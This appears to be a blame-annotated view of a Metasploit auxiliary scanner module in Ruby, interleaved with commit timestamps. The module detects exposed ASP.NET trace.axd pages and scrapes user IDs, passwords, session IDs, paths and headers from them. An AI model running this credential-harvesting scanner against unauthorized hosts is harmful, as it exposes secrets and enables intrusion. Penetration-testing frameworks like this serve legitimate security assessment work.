2010-04-26 18:29:24 +00:00
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# $Id$
|
|
|
|
##
|
|
|
|
|
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2010-04-26 18:29:24 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
|
|
# Framework web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/framework/
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
# Exploit mixins should be called first
|
2010-04-30 08:40:19 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
2010-04-26 18:29:24 +00:00
|
|
|
include Msf::Auxiliary::WMAPScanDir
|
|
|
|
# Scanner mixin should be near last
|
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize
|
|
|
|
super(
|
|
|
|
'Name' => 'HTTP trace.axd Content Scanner',
|
2010-05-03 17:13:09 +00:00
|
|
|
'Version' => '$Revision$',
|
2010-04-26 18:29:24 +00:00
|
|
|
'Description' => 'Detect trace.axd files and analize its content',
|
|
|
|
'Author' => ['c4an'],
|
|
|
|
'License' => MSF_LICENSE
|
|
|
|
)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('PATH', [ true, "The test path to find trace.axd file", '/']),
|
2010-04-30 08:40:19 +00:00
|
|
|
OptBool.new('TRACE_DETAILS', [ true, "Display trace.axd details", true ])
|
2010-04-26 18:29:24 +00:00
|
|
|
], self.class)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
register_advanced_options(
|
|
|
|
[
|
|
|
|
OptString.new('StoreFile', [ false, "Store all information into a file", './trace_axd.log'])
|
|
|
|
], self.class)
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
2010-04-26 18:29:24 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
def run_host(target_host)
|
|
|
|
tpath = datastore['PATH']
|
2010-04-26 18:29:24 +00:00
|
|
|
if tpath[-1,1] != '/'
|
|
|
|
tpath += '/'
|
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
turl = tpath+'trace.axd'
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
res = send_request_cgi({
|
2010-04-30 08:40:19 +00:00
|
|
|
'uri' => turl,
|
2010-04-26 18:29:24 +00:00
|
|
|
'method' => 'GET',
|
|
|
|
'version' => '1.0',
|
|
|
|
}, 10)
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
if res and res.body.include?("<td><h1>Application Trace</h1></td>")
|
|
|
|
print_status("[#{target_host}] #{tpath}trace.axd FOUND.")
|
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
report_note(
|
|
|
|
:host => target_host,
|
|
|
|
:proto => 'HTTP',
|
|
|
|
:port => rport,
|
|
|
|
:type => 'TRACE_AXD',
|
|
|
|
:data => "trace.axd"
|
|
|
|
)
|
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
if datastore['TRACE_DETAILS']
|
|
|
|
|
|
|
|
aregex = /Trace.axd\?id=\d/
|
2010-04-26 18:29:24 +00:00
|
|
|
result = res.body.scan(aregex).uniq
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
result.each do |u|
|
|
|
|
turl = tpath+u.to_s
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
res = send_request_cgi({
|
2010-04-30 08:40:19 +00:00
|
|
|
'uri' => turl,
|
2010-04-26 18:29:24 +00:00
|
|
|
'method' => 'GET',
|
|
|
|
'version' => '1.0',
|
|
|
|
}, 10)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
if res
|
2010-04-30 08:40:19 +00:00
|
|
|
reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/,
|
2010-04-26 18:29:24 +00:00
|
|
|
/<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
|
|
|
|
/<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
|
2010-04-30 08:40:19 +00:00
|
|
|
/<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/,
|
2010-04-26 18:29:24 +00:00
|
|
|
/<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
|
2010-04-30 08:40:19 +00:00
|
|
|
]
|
2010-04-26 18:29:24 +00:00
|
|
|
print_status ("DETAIL: #{turl}")
|
|
|
|
reg_info.each do |reg|
|
|
|
|
result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
|
|
|
|
str = result.to_s.chomp
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
|
|
|
|
if reg.to_s.include?"APPL_PHYSICAL_PATH"
|
2010-04-26 18:29:24 +00:00
|
|
|
print_status ("Physical Path: #{str}")
|
|
|
|
elsif reg.to_s.include?"UserId"
|
|
|
|
print_status ("User ID: #{str}")
|
|
|
|
elsif reg.to_s.include?"Password"
|
2010-04-30 08:40:19 +00:00
|
|
|
print_status ("Password: #{str}")
|
2010-04-26 18:29:24 +00:00
|
|
|
elsif reg.to_s.include?"AspFilterSessionId"
|
|
|
|
print_status ("Session ID: #{str}")
|
2010-04-30 08:40:19 +00:00
|
|
|
elsif reg.to_s.include?"LOCAL_ADDR"
|
2010-04-26 18:29:24 +00:00
|
|
|
print_status ("Local Address: #{str}")
|
|
|
|
elsif result.include?"Via"
|
|
|
|
print_status ("VIA: #{str}")
|
2010-04-30 08:40:19 +00:00
|
|
|
elsif reg.to_s.include?"ALL_RAW"
|
2010-04-26 18:29:24 +00:00
|
|
|
print_status ("Headers: #{str}")
|
|
|
|
end
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
|
|
|
end
|
2010-04-26 18:29:24 +00:00
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|
|
|
|
|
2010-04-26 18:29:24 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2010-02-01 02:49:18 +00:00
|
|
|
end
|